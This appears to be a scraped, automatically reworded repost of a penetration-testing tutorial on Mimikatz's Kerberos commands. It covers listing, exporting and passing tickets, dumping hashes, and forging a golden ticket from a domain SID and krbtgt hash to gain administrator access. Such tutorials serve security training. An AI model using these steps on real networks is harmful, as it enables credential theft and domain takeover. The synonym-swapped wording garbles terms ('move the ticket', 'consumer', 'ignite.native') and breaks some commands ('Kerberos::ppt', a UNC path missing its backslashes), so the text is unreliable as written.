Monday, July 11, 2022
HomeHackerMimiKatz for Pentester: Kerberos - Hacking Articles

MimiKatz for Pentester: Kerberos – Hacking Articles


This write-up will probably be a part of a sequence of articles on the software known as Mimikatz which was created within the programming language C. it’s principally used for extracting Kerberos ticket from the reminiscence and producing golden tickets.

Desk of Content material

  • Kerberos::listing
  • Kerberos::listing /export
  • Kerberos::ppt ticket.kirbi
  • Kerberos::tgt
  • Kerberos::ask
  • Kerberos::hash
  • Kerberos::golden
  • Kerberos::ptc
  • Kerberos::clist
  • Kerberos::purge

On this situation, we will probably be utilizing Mimikatz contained in the consumer machine to seek out out tickets obtainable inside the consumer system.

Kerberos::listing

We’ll use the command:

kerberos::listing

This listing command will show all of the tickets obtainable on the consumer machine.

As you’ll be able to see from the above screenshot, there are 2 tickets inside our consumer machine. The listing command will present info equivalent to:

  1. Begin/Finish time of ticket
  2. Server title
  3. Shopper title
  4. and the Flag

Kerberos::listing /export

Now as soon as this info has been obtainable and if we wish to save these for future use or reference, we’ll use the next command:

kerberos::listing /export

It will save the above TGT tickets within the Mimikatz folder within the kirbi format.

Now that the ticket has been saved within the Mimikatz folder, we renamed it to ticket.kirbi for ease of use. Notice that this isn’t a compulsory course of.

Since we now have this ticket, we’ll now see how it may be used in a while for lateral motion in order that we are able to carry out move the ticket assault.

To carry out the move the ticket connect (ptt) we’ll situation the next command:

Kerberos::ppt ticket.kirbi

As soon as the command has been executed efficiently, we’ll situation one other command misc::cmd which can open a command immediate session. We will see that the command immediate session has been opened with the area consumer igniteaarti.

Let’s attempt to browse the listing of the server with the consumer aarti by typing the next command within the command immediate:

dir 192.168.1.188c$ (192.168.1.188 is the server IP deal with)

As you’ll be able to see, we’re in a position to view all of the directories of the server.

So being a non-administrator area account, the consumer aarti was in a position to test the listing of the C drive of the server through the use of a PTT assault.

Kerberos TGT

To show all TGT (Ticket Granting Ticket), we are able to use the next command:

kerberos::tgt

Kerberos ASK

It lets you entry the service ticket. The syntax for operating this command is as follows:

Kerberos::ask /goal/spn title ,the place spn title is cifs:/dc1.ignite.native

kerberos::ask /goal:cifs/dc1.ignite.native

To show all of the service tickets, we situation the command:

kerberos::listing

As we are able to see, we now have 3 tickets listed beneath.

Kerberos Hash

kerberos::hash

It will dump all hashes obtainable on the consumer machine.

Kerberos ::golden

Golden Ticket Assault (GTA)

Golden Tickets are cast Ticket-Granting Tickets (TGTs), additionally known as authentication tickets. Some primary info wanted to carry out this assault are:

  1. Area title: ignite.native
  2. SID: S-1-5-21-1255168540-3690278322-1592948969
  3. KRBTGT Hash: 5cced0cb593612f08cf4a0b4f0bcb017
  4. And an impersonate consumer: raaz

So if we now have the area title, the SID and the hash worth of krbtgt, then we are able to go for move the ticket assault by producing a pretend golden ticket assault.

So the command for performing GTA is as follows:

kerberos::golden /consumer:raaz /area:ignite.native /sid S-1-5-21-1255168540-3690278322-1592948969 /krbtgt: 5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt

The place the id:500 is for administrator privilege

As proven above, the command has been accomplished efficiently. Now let’s launch the command immediate through Mimikatz by issuing the command: misc::cmd

By way of the brand new command immediate, we can entry the server directories similar as in earlier examples.

One other methodology of golden ticket assault might be carried out through the use of the software impacket.

When utilizing Mimikatz or Rubeus, they’ll generate the ticket in .kirbi format file. But when we use impacket for golden ticket assault in order that we are able to get the ticket, it is not going to offer you ticket in kirbi format. It gives you the ticket in .ccache format.

Kerberos::ptc

So if we now have the ticket in ccache format, then we are able to carry out the move the ccache as proven beneath. Command is:

kerberos::ptc Administrator.ccache

The misc::cmd will open a brand new command immediate through which we can entry the server directories, similar as our earlier examples.

Kerberos::clist

If we wish to listing all of the ccache recordsdata that exist on the consumer system, we use the next command:

kerberos::clist Administrator.cache

Kerberos::purge

If we wish to delete all of the tickets, both ccache or kirbi format, we are able to use the next command:

kerberos::purge

Creator: Tirut Hawoldar is a Cyber Safety Fanatic and CTF participant with 15 years of expertise in IT Safety and Infrastructure. Could be Contacted on LinkedIn

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments